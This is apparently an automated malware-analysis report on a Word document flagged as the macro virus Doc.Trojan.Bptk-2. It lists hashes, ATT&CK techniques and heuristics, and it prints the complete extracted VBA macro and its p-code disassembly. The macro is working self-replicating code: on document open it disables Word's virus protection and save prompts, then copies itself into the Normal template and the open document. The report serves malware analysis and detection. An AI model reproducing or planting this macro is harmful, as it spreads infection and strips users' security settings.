Office (OLE) malware analysis — malicious · b544431fa9d59e02

MALICIOUS

Office (OLE)

26.5 KB Created: 1999-06-16 13:03:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 50ccf9e3c473868f1568ca6319da9a93 SHA-1: 3c4a29e9a654947e9266eedf9d79ffc70e1c1cd8 SHA-256: b544431fa9d59e0277a31c68431a18d1cff67698cdcb6d24c2b41222d8579646

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open subroutine, which is a common technique for executing malicious code when a document is opened. The macro attempts to disable security features and copy code, indicating an intent to execute a payload. The ClamAV detection name 'Doc.Trojan.Bptk-2' further supports its malicious nature.

Heuristics 3

ClamAV: Doc.Trojan.Bptk-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Bptk-2
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3901 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3901 bytes
SHA-256: `cec3375ae54e5985bdb09cdc9dc63a853512cccaedc090880436b03eff6aa095`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next 'D Application.EnableCancelKey = 0 With Options: .ConfirmConversions = 0 .SaveNormalPrompt = 0 .VirusProtection = 0 End With t = "D" If ActiveDocument.VBProject.VBComponents.Item(1).Codemodule.Lines(2, 1) <> "On Error Resume Next 'D" Then Set d = ActiveDocument.VBProject.VBComponents.Item(1) Set c = NormalTemplate.VBProject.VBComponents.Item(1) ElseIf NormalTemplate.VBProject.VBComponents.Item(1).Codemodule.Lines(2, 1) <> "On Error Resume Next 'D" Then Set d = NormalTemplate.VBProject.VBComponents.Item(1) Set c = ActiveDocument.VBProject.VBComponents.Item(1) Else: t = "" End If If t <> "" Then d.Codemodule.DeleteLines 1, d.Codemodule.CountOfLines d.Codemodule.AddFromString c.Codemodule.Lines(1, c.Codemodule.CountOfLines) ActiveDocument.Save NormalTemplate.Save End If Randomize If Rnd < 0.3 Then MsgBox "ÁÏÒÊ" End Sub ' Processing file: /opt/analyzer/scan_staging/0e86c12cf45642cfbf3fd5f68b5deb02.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 2322 bytes ' Line #0: ' FuncDefn (Private Sub Document_Open()) ' Line #1: ' OnError (Resume Next) ' QuoteRem 0x0015 0x0001 "D" ' Line #2: ' LitDI2 0x0000 ' Ld Application ' MemSt EnableCancelKey ' Line #3: ' StartWithExpr ' Ld Options ' With ' BoS 0x0000 ' Line #4: ' LitDI2 0x0000 ' MemStWith ConfirmConversions ' Line #5: ' LitDI2 0x0000 ' MemStWith SaveNormalPrompt ' Line #6: ' LitDI2 0x0000 ' MemStWith VirusProtection ' Line #7: ' EndWith ' Line #8: ' LitStr 0x0001 "D" ' St t ' Line #9: ' LitDI2 0x0002 ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd Codemodule ' ArgsMemLd Lines 0x0002 ' LitStr 0x0017 "On Error Resume Next 'D" ' Ne ' IfBlock ' Line #10: ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' Set d ' Line #11: ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' Set c ' Line #12: ' LitDI2 0x0002 ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd Codemodule ' ArgsMemLd Lines 0x0002 ' LitStr 0x0017 "On Error Resume Next 'D" ' Ne ' ElseIfBlock ' Line #13: ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' Set d ' Line #14: ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' Set c ' Line #15: ' ElseBlock ' BoS 0x0000 ' LitStr 0x0000 "" ' St t ' Line #16: ' EndIfBlock ' Line #17: ' Ld t ' LitStr 0x0000 "" ' Ne ' IfBlock ' Line #18: ' LitDI2 0x0001 ' Ld d ' MemLd Codemodule ' MemLd CountOfLines ' Ld d ' MemLd Codemodule ' ArgsMemCall DeleteLines 0x0002 ' Line #19: ' LitDI2 0x0001 ' Ld c ' MemLd Codemodule ' MemLd CountOfLines ' Ld c ' MemLd Codemodule ' ArgsMemLd Lines 0x0002 ' Ld d ' MemLd Codemodule ' ArgsMemCall AddFromString 0x0001 ' Line #20: ' Ld ActiveDocument ' ArgsMemCall Save 0x0000 ' Line #21: ' Ld NormalTemplate ' ArgsMemCall Save 0x0000 ' Line #22: ' EndIfBlock ' Line #23: ' ArgsCall Read 0x0000 ' Line #24: ' Ld Rnd ' LitR8 0x3333 0x3333 0x3333 0x3FD3 ' Lt ' If ' BoSImplicit ' LitStr 0x0004 "ÁÏÒÊ" ' ArgsCall MsgBox 0x0001 ' EndIf ' Line #25: ' EndSub ' Line #26: ' Line #27:

SHA-256: cec3375ae54e5985bdb09cdc9dc63a853512cccaedc090880436b03eff6aa095

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next 'D
Application.EnableCancelKey = 0
With Options:
.ConfirmConversions = 0
.SaveNormalPrompt = 0
.VirusProtection = 0
End With
t = "D"
If ActiveDocument.VBProject.VBComponents.Item(1).Codemodule.Lines(2, 1) <> "On Error Resume Next 'D" Then
Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set c = NormalTemplate.VBProject.VBComponents.Item(1)
ElseIf NormalTemplate.VBProject.VBComponents.Item(1).Codemodule.Lines(2, 1) <> "On Error Resume Next 'D" Then
Set d = NormalTemplate.VBProject.VBComponents.Item(1)
Set c = ActiveDocument.VBProject.VBComponents.Item(1)
Else: t = ""
End If
If t <> "" Then
d.Codemodule.DeleteLines 1, d.Codemodule.CountOfLines
d.Codemodule.AddFromString c.Codemodule.Lines(1, c.Codemodule.CountOfLines)
ActiveDocument.Save
NormalTemplate.Save
End If
Randomize
If Rnd < 0.3 Then MsgBox "ÁÏÒÊ"
End Sub



' Processing file: /opt/analyzer/scan_staging/0e86c12cf45642cfbf3fd5f68b5deb02.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 2322 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' 	QuoteRem 0x0015 0x0001 "D"
' Line #2:
' 	LitDI2 0x0000 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #3:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' 	BoS 0x0000 
' Line #4:
' 	LitDI2 0x0000 
' 	MemStWith ConfirmConversions 
' Line #5:
' 	LitDI2 0x0000 
' 	MemStWith SaveNormalPrompt 
' Line #6:
' 	LitDI2 0x0000 
' 	MemStWith VirusProtection 
' Line #7:
' 	EndWith 
' Line #8:
' 	LitStr 0x0001 "D"
' 	St t 
' Line #9:
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd Codemodule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0017 "On Error Resume Next 'D"
' 	Ne 
' 	IfBlock 
' Line #10:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set d 
' Line #11:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set c 
' Line #12:
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd Codemodule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0017 "On Error Resume Next 'D"
' 	Ne 
' 	ElseIfBlock 
' Line #13:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set d 
' Line #14:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set c 
' Line #15:
' 	ElseBlock 
' 	BoS 0x0000 
' 	LitStr 0x0000 ""
' 	St t 
' Line #16:
' 	EndIfBlock 
' Line #17:
' 	Ld t 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #18:
' 	LitDI2 0x0001 
' 	Ld d 
' 	MemLd Codemodule 
' 	MemLd CountOfLines 
' 	Ld d 
' 	MemLd Codemodule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #19:
' 	LitDI2 0x0001 
' 	Ld c 
' 	MemLd Codemodule 
' 	MemLd CountOfLines 
' 	Ld c 
' 	MemLd Codemodule 
' 	ArgsMemLd Lines 0x0002 
' 	Ld d 
' 	MemLd Codemodule 
' 	ArgsMemCall AddFromString 0x0001 
' Line #20:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #21:
' 	Ld NormalTemplate 
' 	ArgsMemCall Save 0x0000 
' Line #22:
' 	EndIfBlock 
' Line #23:
' 	ArgsCall Read 0x0000 
' Line #24:
' 	Ld Rnd 
' 	LitR8 0x3333 0x3333 0x3333 0x3FD3 
' 	Lt 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0004 "ÁÏÒÊ"
' 	ArgsCall MsgBox 0x0001 
' 	EndIf 
' Line #25:
' 	EndSub 
' Line #26:
' Line #27:

Open this report in the interactive analyzer, or submit your own file for analysis.